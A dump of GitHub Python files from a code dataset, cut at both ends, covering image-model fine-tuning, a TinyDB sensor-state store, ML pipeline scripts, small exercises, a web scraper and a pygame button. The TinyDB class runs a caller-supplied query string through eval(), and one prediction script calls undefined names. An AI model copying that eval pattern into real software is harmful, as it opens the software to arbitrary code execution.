'class',\n class_mode = 'binary',\n target_size = image_size,\n batch_size = 6)\n self.testX, self.testY = val_gen.next()\n\n\n def model(self):\n model = VGG16(include_top=True, weights='imagenet')\n print(model.summary())\n\n transfer_layer = model.get_layer('block5_pool')\n vgg_model = Model(inputs=model.input, output=transfer_layer.output)\n\n # choose layer to fine-tune\n # freeze all but last layer\n\n for layer in vgg_model.layers[0:17] :\n layer.trainable = False\n\n for layer in vgg_model.layers :\n print(layer.name, layer.trainable)\n\n\n new_model = Sequential()\n\n # add layer part of the VGG16 model\n new_model.add(vgg_model)\n\n # flatten the outputs\n new_model.add(Flatten())\n\n # add a dropout layer\n new_model.add(Dropout(0.5))\n\n # add a dense layer\n new_model.add(Dense(1024, activation='relu'))\n\n # add a dropout layer\n new_model.add(Dropout(0.5))\n\n # add another layer\n new_model.add(Dense(512, activation='relu'))\n\n # add a droupout layer\n new_model.add(Dropout(0.5))\n\n new_model.add(Dense(256, activation='relu'))\n\n # add output layer\n new_model.add(Dense(1, activation='sigmoid'))\n\n # set optimizer , loss function and learning rate\n optimizer = Adam(lr=10e-4)\n loss = 'binary_crossentropy'\n metrics = ['binary_accuracy']\n\n new_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n\n # run a single epoch\n hist = new_model.fit(self.train_gen, validation_data=(self.testX, self.testY) , epochs=10)\n\n return hist\n\ndef plot_history(history):\n N = len(history.history[\"loss\"])\n plt.style.use(\"ggplot\")\n plt.figure()\n plt.plot(np.arange(0, N), history.history[\"loss\"], label=\"train_loss\")\n plt.plot(np.arange(0, N), history.history[\"val_loss\"], label=\"val_loss\")\n plt.plot(np.arange(0, N), history.history[\"binary_accuracy\"], label=\"train_acc\")\n plt.plot(np.arange(0, N), history.history[\"val_binary_accuracy\"], label=\"val_acc\")\n plt.title(\"Training Loss and Accuracy on Dataset\")\n plt.xlabel(\"Epoch #\")\n plt.ylabel(\"Loss/Accuracy\")\n plt.legend(loc=\"lower left\")\n\n\nif __name__ == '__main__' :\n t = Tune()\n plot_history(t.model())","repo_name":"WyckliffeAluga/potential-happiness","sub_path":"ai-healthcare/pneumonia-detection/modelling/tune/fine_tuning.py","file_name":"fine_tuning.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20504437616","text":"import datetime\nimport struct\nimport numpy as np\nfrom tinydb import TinyDB, Query, where\nfrom tinydb.table import Document\n\n\nclass ProcessedState:\n def __init__(self, **kwargs):\n\n # Db Path\n self.dbPath = 'db/statedb.json'\n\n self.statesList = []\n\n if kwargs.get('processed_data'):\n self.addProcessedData(kwargs['processed_data'])\n if kwargs.get('query'):\n self.getDataFromDb(kwargs['query'])\n\n def addProcessedData(self, processed_data):\n # Getting processed parameters\n prev_state = processed_data[0]\n prev_image = processed_data[2]\n curr_state = processed_data[1]\n curr_image = processed_data[3]\n\n # Creating dictionary for previous states\n prev_state_dict = {\n 'light_sensor': int.from_bytes(prev_state[0:4], byteorder='little', signed=False),\n 'ultra_sound_left': int.from_bytes(prev_state[4:8], byteorder='little', signed=False),\n 'ultra_sound_right': int.from_bytes(prev_state[8:12], byteorder='little', signed=False),\n 'laser': int.from_bytes(prev_state[12:16], byteorder='little', signed=False),\n 'left_motor': struct.unpack('f', prev_state[16:20]),\n 'right_motor': struct.unpack('f', prev_state[20:24]),\n 'reward': struct.unpack('f', prev_state[24:28]),\n 'image': np.array(prev_image)\n }\n\n # Creating dictionary for current states\n curr_state_dict = {\n 'light_sensor': int.from_bytes(curr_state[0:4], byteorder='little', signed=False),\n 'ultra_sound_left': int.from_bytes(curr_state[4:8], byteorder='little', signed=False),\n 'ultra_sound_right': int.from_bytes(curr_state[8:12], byteorder='little', signed=False),\n 'laser': int.from_bytes(curr_state[12:16], byteorder='little', signed=False),\n 'left_motor': None,\n 'right_motor': None,\n 'reward': None,\n 'image': np.array(curr_image)\n }\n\n self.statesList.append({'prev_state': prev_state_dict, 'curr_state': curr_state_dict})\n return prev_state_dict, curr_state_dict\n\n # Search from db with TinyDb Queries.\n # Documentation: https://tinydb.readthedocs.io/en/latest/usage.html#handling-data\n # Use 'state' instead of query instance. Expected type: String\n def getDataFromDb(self, query):\n db = TinyDB(self.dbPath)\n query_list = db.search(eval(query))\n\n # Correcting format of images\n for states in query_list:\n states['prev_state']['image'] = np.array(states['prev_state']['image'])\n states['curr_state']['image'] = np.array(states['curr_state']['image'])\n\n self.statesList = self.statesList + query_list\n\n # Saves all states in statesList or if exists, updates.\n def saveActualStates(self):\n db = TinyDB(self.dbPath)\n for states in self.statesList:\n\n # Changing np.arrays to lists, so we can serialize them\n states['prev_state']['image'] = states['prev_state']['image'].tolist()\n states['curr_state']['image'] = states['curr_state']['image'].tolist()\n\n date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n try:\n states['update_date'] = date\n db.update(Document(states, doc_id=states.doc_id))\n except AttributeError:\n states['create_date'] = date\n db.insert(states)","repo_name":"istvanaut/TK-MachineLearning","sub_path":"AGVCar/PythonServer/ProcessedState.py","file_name":"ProcessedState.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38273431615","text":"'''\nEstimate modulation after randomizing trials.\n'''\n\n\nimport sys\nimport os\nimport numpy as np\n#from scipy import stats\n#from scipy import signal\nfrom jaratoolbox import settings\nfrom jaratoolbox import celldatabase\nreload(celldatabase)\nfrom jaratoolbox import ephyscore\n#reload(ephyscore)\n#from jaratoolbox import spikesanalysis\n#from jaratoolbox import extraplots\nimport figparams\n#from matplotlib import pyplot as plt\n\n\nevlockDataPath = '/var/tmp/processed_data/'\n#evlockDataPath = os.path.join(settings.EPHYS_PATH, figparams.STUDY_NAME, 'evlock_spktimes')\n\ndatabaseFullPath = os.path.join(settings.DATABASE_PATH, figparams.STUDY_NAME, 'rc_database.h5')\n#celldb = celldatabase.load_hdf(databaseFullPath)\ncelldb = celldatabase.load_hdf_subset(databaseFullPath,ignore=['behavSuffix','ephysTime','paradigm','sessionType'])\n\nsys.exit()\n\n\nbrainAreas = ['rightAC','rightAStr']\n\nfor brainArea in brainAreas:\n goodQualCells = celldb.query(\"keepAfterDupTest==1 and cellInTargetArea==1 and brainArea=='{}'\".format(brainArea))\n cellsToProcess = goodQualCells\n\n for indc,cellrow in cellsToProcess.iterrows():\n\n # -- Load behavior data --\n cellObj = ephyscore.Cell(cellrow)\n print('{}: {}'.format(indc,cellObj))\n sessionInds = cellObj.get_session_inds('behavior')\n assert len(sessionInds)==1 # There should only be one behavior session\n bdata = cellObj.load_behavior_by_index(sessionInds[0])\n \n # -- Load (preprocessed) ephys data --\n alignment = 'center-out'\n #evlockDataFilename = 'eventlocked_{0}_{1}_{2}_T{3}_c{4}_{5}.npz'.format(cellrow.subject, cellrow.date, cellrow.depth,\n # cellrow.tetrode, cellrow.cluster, alignment)\n evlockDataFilename = 'eventlocked_{}_{}_T{}c{}_{}.npz'.format(cellrow.subject, cellrow.date, \n cellrow.tetrode, cellrow.cluster, alignment)\n evlockDataFullpath = os.path.join(evlockDataPath, evlockDataFilename)\n try:\n evlockSpktimes = np.load(evlockDataFullpath)\n except IOError:\n print('-- File not found: '.format(evlockDataFullpath))\n continue\n spikeTimesFromEventOnset = evlockSpktimes['spikeTimesFromEventOnset']\n indexLimitsEachTrial = evlockSpktimes['indexLimitsEachTrial']\n trialIndexForEachSpike = evlockSpktimes['trialIndexForEachSpike']\n timeRange = evlockSpktimes['timeRange']\n missingTrials = evlockSpktimes['missingTrials']\n","repo_name":"sjara/jaratest","sub_path":"common/2018rc/testgen_randomize_trials.py","file_name":"testgen_randomize_trials.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18467270920","text":"from metaflow import FlowSpec, step, Parameter\nimport det\nimport os\n\ndef script_path(filename):\n \"\"\"\n A convenience function to get the absolute path to a file in this\n tutorial's directory. This allows the tutorial to be launched from any\n directory.\n\n \"\"\"\n import os\n\n filepath = os.path.join(os.path.dirname(__file__))\n return os.path.join(filepath, filename)\n\n\nclass DeterminedFlow(FlowSpec):\n \"\"\"\n A flow to train an MNIST model on Determined.\n\n \"\"\"\n\n det_master = Parameter('det-master',\n help='Determined Master IP',\n default=\"localhost:8080\")\n\n config_file = Parameter('config-file',\n help='Configuration file for experiment',\n default='local.yaml')\n\n local_exp_dir = Parameter('local-exp-dir',\n help='Directory with experiment code',\n default=\"albert_squad_pytorch\")\n\n @step\n def start(self):\n \"\"\"\n Placeholder step to process and transform data\n\n \"\"\"\n self.data = \"example data\"\n\n print(f\"This is your data: {self.data}\")\n\n # Proceed with the model training.\n self.next(self.train)\n\n @step\n def train(self):\n \"\"\"\n This step uses the data processed in the previous step to train the model using a model definition from a Github repo.\n \"\"\"\n\n # Override parameters if manually set by user\n det_master=self.det_master\n config_file=self.config_file\n local_exp_dir=self.local_exp_dir\n\n # Setup example by cloning example repo and installing the Determined CLI\n det.setup()\n\n # Submit determined experiment via CLI and wait for completion\n experiment_id = det.submit(det_master, config_file, local_exp_dir)\n\n self.experiment_id = experiment_id\n self.next(self.get_metrics)\n\n @step\n def get_metrics(self):\n \"\"\"\n Get metric from top checkpoint\n\n \"\"\"\n\n metric = det.get_metrics(self.det_master, self.experiment_id)\n\n print(f\"TOP METRIC: {metric}\")\n\n # Set metric to beat\n metric_to_beat = 0\n # This should always pass\n if float(metric) > metric_to_beat:\n print(f\"Current metric {metric} is greater than metric to beat {metric_to_beat} - continuing pipeline\")\n \n self.next(self.end)\n\n @step\n def end(self):\n \"\"\"\n Confirm completion of Flow\n \"\"\"\n\n print(\"This flow is now complete.\")\n\nif __name__ == '__main__':\n DeterminedFlow()\n","repo_name":"determined-ai/works-with-determined","sub_path":"metaflow/example-determined.py","file_name":"example-determined.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"36343197967","text":"import numpy as np\n\n# Local imports\nfrom .visualiserBase import Visualiser\n\n\nclass VisualiserBoundingBoxes(Visualiser):\n\n data_type = 'boundingBoxes'\n\n def __init__(self, data):\n self.set_data(data)\n\n def set_data(self, data):\n self.__data = {}\n self.__data.update(data)\n\n def get_data(self):\n return self.__data\n\n def get_frame(self, time, timeWindow, **kwargs):\n if self.__data is None or not kwargs.get('show_bounding_boxes', True):\n return None\n gt_bb = self.__data\n indices = abs(gt_bb['ts'] - time) < timeWindow\n if not any(indices):\n if not kwargs.get('interpolate'):\n return None\n if kwargs.get('interpolate'):\n boxes = []\n for label in np.unique(gt_bb['label']):\n label_mask = gt_bb['label'] == label\n ts = gt_bb['ts'][label_mask]\n minY = gt_bb['minY'][label_mask]\n minX = gt_bb['minX'][label_mask]\n maxY = gt_bb['maxY'][label_mask]\n maxX = gt_bb['maxX'][label_mask]\n\n i1 = np.searchsorted(ts, time)\n i0 = i1 - 1\n if i0 < 0:\n if abs(ts[0] - time) < timeWindow:\n if kwargs.get('with_labels', True) and 'label' in gt_bb.keys():\n boxes.append((minY[0], minX[0], maxY[0], maxX[0], label))\n else:\n boxes.append((minY[0], minX[0], maxY[0], maxX[0]))\n continue\n else:\n continue\n if i1 >= len(ts):\n if abs(ts[-1] - time) < timeWindow:\n if kwargs.get('with_labels', True) and 'label' in gt_bb.keys():\n boxes.append((minY[-1], minX[-1], maxY[-1], maxX[-1], label))\n else:\n boxes.append((minY[-1], minX[-1], maxY[-1], maxX[-1]))\n continue\n else:\n continue\n\n minY_interp = minY[i0] + ((minY[i1] - minY[i0]) / abs(ts[i1] - ts[i0])) * (time - ts[i0])\n minX_interp = minX[i0] + ((minX[i1] - minX[i0]) / abs(ts[i1] - ts[i0])) * (time - ts[i0])\n maxY_interp = maxY[i0] + ((maxY[i1] - maxY[i0]) / abs(ts[i1] - ts[i0])) * (time - ts[i0])\n maxX_interp = maxX[i0] + ((maxX[i1] - maxX[i0]) / abs(ts[i1] - ts[i0])) * (time - ts[i0])\n if kwargs.get('with_labels', True) and 'label' in gt_bb.keys():\n boxes.append((minY_interp, minX_interp, maxY_interp, maxX_interp, label))\n else:\n boxes.append((minY_interp, minX_interp, maxY_interp, maxX_interp))\n boxes = np.array(boxes).astype(int)\n else:\n boxes = np.column_stack((gt_bb['minY'][indices], gt_bb['minX'][indices],\n gt_bb['maxY'][indices], gt_bb['maxX'][indices])).astype(int)\n if kwargs.get('with_labels', True) and 'label' in gt_bb.keys():\n labels = gt_bb['label'][indices].astype(int)\n boxes = np.column_stack([boxes, labels])\n boxes = np.unique(boxes, axis=0)\n return boxes\n\n def get_settings(self):\n settings = {'with_labels': {'type': 'boolean',\n 'default': True\n },\n 'show_bounding_boxes': {'type': 'boolean',\n 'default': True\n },\n 'interpolate': {'type': 'boolean',\n 'default': False\n }\n }\n return settings\n","repo_name":"event-driven-robotics/bimvee","sub_path":"bimvee/visualisers/visualiserBoundingBoxes.py","file_name":"visualiserBoundingBoxes.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"29595900495","text":"import argparse\nimport json\nfrom collections import Counter\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm, trange\n\nfrom Modules.MLP import MLP\nfrom utils.dataset import MulAttDataset\nfrom utils.config import init_opts, train_opts, eval_opts, multihead_att_opts\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--seed', default=2021, type=int)\nparser.add_argument('--gpu', default=0, type=int)\nparser.add_argument('--name', default=\"med-bert\", type=str)\nparser.add_argument('--cleaned_path', default='./cleaned', type=str)\n\nparser.add_argument('--dr_dialog_sample', default=2, type=int)\nparser.add_argument('--neg_sample', default=2, type=int)\nparser.add_argument('--batch_size', default=2, type=int)\nparser.add_argument('--lr', default=2e-5, type=int)\nparser.add_argument('--patience', default=7, type=int)\nparser.add_argument('--output_dir', default=\"saved_model\", type=str)\nparser.add_argument('--epoch_num', default=10, type=int)\n\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\ntorch.cuda.set_device(args.gpu)\n\nprint(f'Prediction: randome seed {args.seed}, experiment name: {args.name}, run on gpu {args.gpu}')\n\ndef main():\n print(f'{args.name} start!')\n print(f'Loadding embeddings from {args.ids_path}...')\n profile_ids = load_pickle(f'{args.cleaned_path}/profile_ids_mini.pkl')\n print(\"Loaded profile ids\")\n query_ids = load_pickle(f'{args.cleaned_path}/q_ids_mini.pkl')\n print(\"Loaded query ids\")\n dialogue_ids = load_pickle(f'{args.cleaned_path}/dialog_ids_mini.pkl')\n print(\"Loaded dialogue ids\")\n end = time.time()\n \n print('Building test dataset and dataloader...')\n test_set = pd.read_csv(f'./dataset/test_mini.csv', delimiter='\\t', encoding='utf-8', dtype={'dr_id': str})\n test_dataset = DoctorRecDataset(\n 'test', test_set, profile_ids, query_ids, dialogue_ids,\n dr_dialog_sample=args.dr_dialog_sample, neg_sample=args.neg_sample\n )\n test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=True)\n del test_set, test_dataset, profile_ids, query_ids, dialogue_ids,\n print('Done')\n \n model = ourModel()\n model_path = f'{args.output_dir}/ckpt/{args.eval_model}'\n model.load_state_dict(torch.load(model_path))\n if torch.cuda.is_available():\n model = model.cuda()\n model.eval()\n \n print(f'{args.name} start prediction...')\n with open(f'{args.output_dir}/test_{args.eval_model}_score.txt', 'w', encoding='utf-8') as score:\n with torch.no_grad():\n pred_scores = test_process(test_dataloader, model)\n for pred_score in pred_scores:\n print(pred_score.cpu().detach().numpy().tolist()[0], file = score)\n\nif __name__ == '__main__':\n main()","repo_name":"ewayuan/DocRec","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6916663825","text":"import string\nimport time\nimport os\n\nos.system('clear || cls')\n\nwith open(\"mytext.txt\", 'r', encoding=\"utf-8\") as f:\n text = f.read()\n\n# print(len(text))\n# print(text.count(' '))\n\ndef count_words(text):\n d = {}\n\n # Убираем заглавные буквы\n text = text.lower()\n\n # Избавляемся от знаков припинания (пунктуации)\n text = text.translate(text.maketrans('', '', string.punctuation))\n\n for word in text.split():\n d[word] = d.get(word, 0) + 1\n\n # Составляем рейтинг слов\n\n word_chart = []\n\n for key, val in d.items():\n word_chart.append((val, key))\n\n word_chart = sorted(word_chart, reverse=True)\n\n return word_chart\n\n\nres = count_words(text)[:5]\n\n# Фильтруем результат с использованием стоп листа\n\nwith open('stoplist.txt', 'r', encoding='utf-8') as f:\n stoplist = f.read().split()\n\n\n# print(stoplist)\n\n# Вносим поправки в стоплист\n\nmy_stop = 'иль ним пред меж сей свой моей'\n\nstoplist = stoplist + my_stop.split()\n\nchart = count_words(text)\n\nfiltered_chart = [w for w in chart if len(w[1]) > 2 and w[1] not in stoplist]\n\n\ntitle = \"Результат частотного анализа\\n\"\nprint(len(title) * \"=\")\nprint(title)\n\nfor count, word in filtered_chart[:10]:\n h = \"#\" * (count // 10)\n time.sleep(0.1)\n print(h, count, word)\n\n\nprint(len(title) * \"=\")","repo_name":"aleksmn/PythonLessons","sub_path":"text-parser/old_main.py","file_name":"old_main.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27806945647","text":"\ndef evennumbers():\n i = 1\n even = []\n while i <=100:\n if i%2 ==0:\n even.append(i)\n i = i + 1\n return even\ndef oddnumbers():\n i = 1\n odd = []\n while i <=100:\n if i%2 !=0:\n odd.append(i)\n i = i + 1\n return odd\n\nprint(\"the even numbers are:\",evennumbers())\nprint(\"the odd numbes are:\",oddnumbers())","repo_name":"Dipjitbaroi/python-basics","sub_path":"loop 2.py","file_name":"loop 2.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9354191246","text":"class User:\n \n def __init__(self, name):\n self.name = name\n self.amount = 0\n \n def make_deposit(self, amount):\n self.amount += amount\n \n def display_user_balance(self):\n print(f\"User: {self.name}, Balance: {self.amount}\")\n \n def make_withdrawal(self, amount):\n self.amount -= amount\n \n\njosh = User(\"Josh\")\nkyle = User(\"Kyle\")\njeremy = User(\"Jeremy\")\n\njosh.make_deposit(100)\njosh.make_deposit(200)\njosh.make_deposit(50)\njosh.make_withdrawal(45)\njosh.display_user_balance()\nkyle.make_deposit(100)\nkyle.make_deposit(200)\nkyle.make_deposit(50)\nkyle.make_withdrawal(45)\nkyle.make_withdrawal(110)\nkyle.display_user_balance()\njeremy.make_deposit(100)\njeremy.make_withdrawal(20)\njeremy.make_withdrawal(50)\njeremy.make_withdrawal(45)\njeremy.display_user_balance()","repo_name":"joshmmiller2/user_assignment_Joshua_Miller","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13761091813","text":"from graph_package.graph import Graph\nimport numpy as np\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nthis script will find the SCC of a graph\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\ndef dfs(g, start, visited=None):\n \"\"\"this is an exploration DFS, meanning it will return a list of\n all the reachable Nodes starting from 'start'\n\n Args:\n g: Graph\n start: starting node\n visited: default=None, supplying the unwanted list of node to explore\n \"\"\"\n if visited is None:\n visited = []\n visited.append(start)\n stack = []\n\n def dfs_helper(src):\n nonlocal stack, visited\n for dst in g[src]:\n if dst.key not in visited:\n visited.append(dst.key)\n dfs_helper(dst.key)\n\n stack.append(src)\n\n dfs_helper(start)\n return stack\n\n\ndef find_SSC(g):\n # getting the order of closing time with DFS\n stack = []\n for v in g.get_vertices():\n if v.key not in stack:\n stack.extend(dfs(g, v.key, stack.copy()))\n\n # transposing the matrix\n mat = g.container.graph\n g.container.graph = np.array(mat).T.tolist()\n\n # apply DFS again on each SCC\n ssc_list = []\n visited = []\n for v in stack[::-1]:\n if v not in visited:\n ssc = dfs(g, v, visited)\n ssc_list.append(ssc)\n visited.extend(ssc.copy())\n\n return ssc_list\n\n\n\n\nif __name__ == \"__main__\":\n\n \"\"\"this is from page 118 lecture 1\"\"\"\n test_graph = {'s': {'v': 1},\n 'v': {'w': 1},\n 'w': {'s': 1},\n 'q': {'w': 1, 's': 1, 't': 1},\n 't': {'x': 1, 'y': 1},\n 'x': {'z': 1},\n 'z': {'x': 1},\n 'y': {'q': 1},\n 'r': {'u': 1, 'y': 1},\n 'u': {'y': 1}\n }\n\n # \"\"\"this is from page 116 lecture 1\"\"\"\n # test_graph = {'a': {'b': 1},\n # 'b': {'c': 1, 'f': 1},\n # 'c': {'d': 1, 'g': 1},\n # 'd': {'c': 1, 'h': 1},\n # 'e': {'a': 1, 'f': 1},\n # 'f': {'g': 1},\n # 'g': {'f': 1, 'h': 1},\n # 'h': {'h': 1}\n # }\n\n # MUST be matrix. we dont support transpose on list\n g = Graph(directed=True, container='matrix')\n for src, neighbors in test_graph.items():\n for dst, _ in neighbors.items():\n g.add_edge(src, dst)\n\n\n print(f'SCC: {find_SSC(g)}')\n","repo_name":"shalip91/Algorithms","sub_path":"graph/dfs_scc_kusaraju.py","file_name":"dfs_scc_kusaraju.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40559444724","text":"#!/bin/python3\nimport argparse\nimport sa\nimport test\n\ndef main():\n parser = argparse.ArgumentParser(description='Simulated Annealing for Node Clustering.')\n parser.add_argument('-number_of_clusters', \n type=int,\n default=3,\n help='the number of clusters that should be generated')\n parser.add_argument('-initial_temperature', \n type=int,\n default=10000,\n help='the initial temperature for simulated annealing')\n parser.add_argument('-final_temperature', \n type=int, \n default=10,\n help='the temperature that, when reached, finishes the algorithm')\n parser.add_argument('-temperature_change', \n type=float,\n default=0.05,\n help='update rate for the temperature')\n parser.add_argument('-iterations_per_temperature', \n type=int,\n default=1,\n help='the number of random movements between two temperature changes')\n\n args = parser.parse_args()\n check_arguments(args)\n print_args(args)\n runner = sa.SA(test.get_big_test_graph(),\n args.number_of_clusters,\n args.initial_temperature,\n args.final_temperature,\n args.temperature_change,\n args.iterations_per_temperature)\n runner.run()\n \ndef check_arguments(args):\n if args.initial_temperature <= 0:\n print(\"Error: initial temperature must be positive.\")\n exit()\n if args.initial_temperature < args.final_temperature:\n print(\"Error: initial temperature is less than final temperature.\")\n exit()\n if args.temperature_change >= 1.0 or args.temperature_change <= 0:\n print(\"Error: temperature change must be between 0 and 1.0 exclusive.\")\n exit()\n if args.iterations_per_temperature <= 0:\n print(\"Error: iterations per temperature must be positive\")\n exit()\n if args.number_of_clusters <= 1:\n print(\"Error: number of clusters must be more than 1\")\n exit()\n\ndef print_args(args):\n print(\"Running SA-Clustering.\\nNumber of clusters: {}\\nInitial temp: {}\\nFinal temp: {}\\nTemp update factor: {}\\nIterations per update: {}\\n\"\n .format(args.number_of_clusters, \n args.initial_temperature, \n args.final_temperature, \n args.temperature_change, \n args.iterations_per_temperature))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MysteriousProgrammer/SimulatedAnnealingClustering","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37364526299","text":"import pygame as pg\nfrom settings import *\nvec = pg.math.Vector2\n\nclass Button:\n# EN KOMMENTAR\n def __init__(self, surface, x, y, text):\n self.surface = surface\n self.x = x\n self.y = y\n self.width = 150\n self.text = text\n self.height = 50\n self.clicked = False\n self.hovering = False\n self.image = pg.Surface((self.width, self.height))\n self.rect = self.image.get_rect()\n\n def update(self):\n if self.mouse_hovering(pos):\n self.hovering = True\n else:\n self.hovering = False\n\n def draw(self):\n action = False\n\n #get mouse position\n pos = pg.mouse.get_pos()\n\n #create pygame Rect object for the button\n button_rect = pg.Rect(self.x, self.y, self.width, self.height)\n #check mouseover and clicked conditions\n if button_rect.collidepoint(pos):\n if pg.mouse.get_pressed()[0] == 1:\n self.clicked = True\n pg.draw.rect(self.surface, PURPLE, button_rect)\n elif pg.mouse.get_pressed()[0] == 0 and self.clicked == True:\n self.clicked = False\n action = True\n else:\n pg.draw.rect(self.surface, LIGHTBLUE2, button_rect)\n else:\n pg.draw.rect(self.surface, LIGHTBLUE, button_rect)\n\n #add text to button\n font = pg.font.SysFont(\"arial\", 25)\n text_img = font.render(self.text, True, BLACK)\n text_len = text_img.get_width()\n self.surface.blit(text_img, (self.x + int(self.width / 2) - int(text_len / 2), self.y + 13))\n\n return action\n","repo_name":"erikjny/sudoku","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25999268226","text":"#This module will scrape the Severn Bridge website for the status of each bridge.\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\n\nclass BridgeStatus:\n \"\"\"Class for keeping bridge status data together\"\"\"\n def __init__(self):\n self.m4 = self.bridge_status()[0]\n self.m48 = self.bridge_status()[1]\n self.timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n def bridge_status(self) -> tuple:\n \"\"\"Parses the web path provided and returns the status of each bridge\n as a tuple of strings\"\"\"\n\n WEB_PATH = \"https://nationalhighways.co.uk/travel-updates/the-severn-bridges/\"\n try:\n # Get web page\n source = requests.get(WEB_PATH).text\n\n if source:\n soup = BeautifulSoup(source, features=\"html.parser\")\n bridge_status = soup.find_all(\"div\", {\"class\": \"severn-crossing-status__heading\"})\n\n m4 = bridge_status[0].text\n m48 = bridge_status[1].text\n\n return (m4, m48)\n except:\n print('sorry, could not find the status')\n\nbridges = BridgeStatus()\nbridges_dict = vars(bridges) # Creates dict of bridges attributes\n\n\n\n\n","repo_name":"Revill74/severn_bridges","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9273733283","text":"from .pages.product_page import ProductPage\n\n\ndef test_should_be_add_to_cart_button(browser):\n link = \"http://selenium1py.pythonanywhere.com/\"\n page = ProductPage(browser, link)\n page.open()\n page.should_be_add_to_cart_button()\n page.solve_quiz_and_get_code()\n\n","repo_name":"elenababayan/exam","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26535377265","text":"import json\nimport add\nimport view\nfrom pprint import pprint\nfrom random import randint as rd, choice as ch\ndef work():\n add.add_random('Words.json')\n add.Write(add.data , 'Words.json')\n print('вы хотите видеть весь список, или конкретную позицию? ')\n print('если весь, то напишите print, а если что-то конкретное, то search')\n def choose(i):\n i = str(input)\n if i == \"search\":\n number = int ( input('какая позиция вас интересует'))\n view.search('Words.json', number)\n elif i ==\"print\":\n view.show_base('Words.json')\n","repo_name":"Nameuser9/First_try_in_the_chapter_development","sub_path":"Словарь модель вторая/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24894140909","text":"from ..middleware import MiddlewareBase\nfrom .perms import can_masquerade\nfrom .settings import get_user_attr, is_enabled\nfrom .util import get_masquerade_user, is_masquerading\n\n\nclass MasqueradeMiddleware(MiddlewareBase):\n\n def enabled(self):\n return is_enabled()\n\n def before_view(self, request):\n masquerade_info = {}\n actual_user = request.user\n if is_masquerading(request):\n request.user = get_masquerade_user(request, source='session')\n masquerade_info.update({\n 'actual_user': actual_user,\n 'can_masquerade': True,\n 'is_masquerading': True,\n })\n else:\n masquerade_info.update({\n 'can_masquerade': can_masquerade(actual_user),\n 'is_masquerading': False,\n })\n setattr(request.user, get_user_attr(), masquerade_info)\n","repo_name":"PSU-OIT-ARC/django-arcutils","sub_path":"arcutils/masquerade/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22293583405","text":"import io\nimport os\nimport toml\nimport asyncio\n\nfrom discord import Intents, Embed, ButtonStyle, Message, Attachment, File, RawReactionActionEvent, ApplicationContext\nfrom discord.ext import commands\nfrom discord.ui import View, button\nfrom dotenv import load_dotenv\nfrom 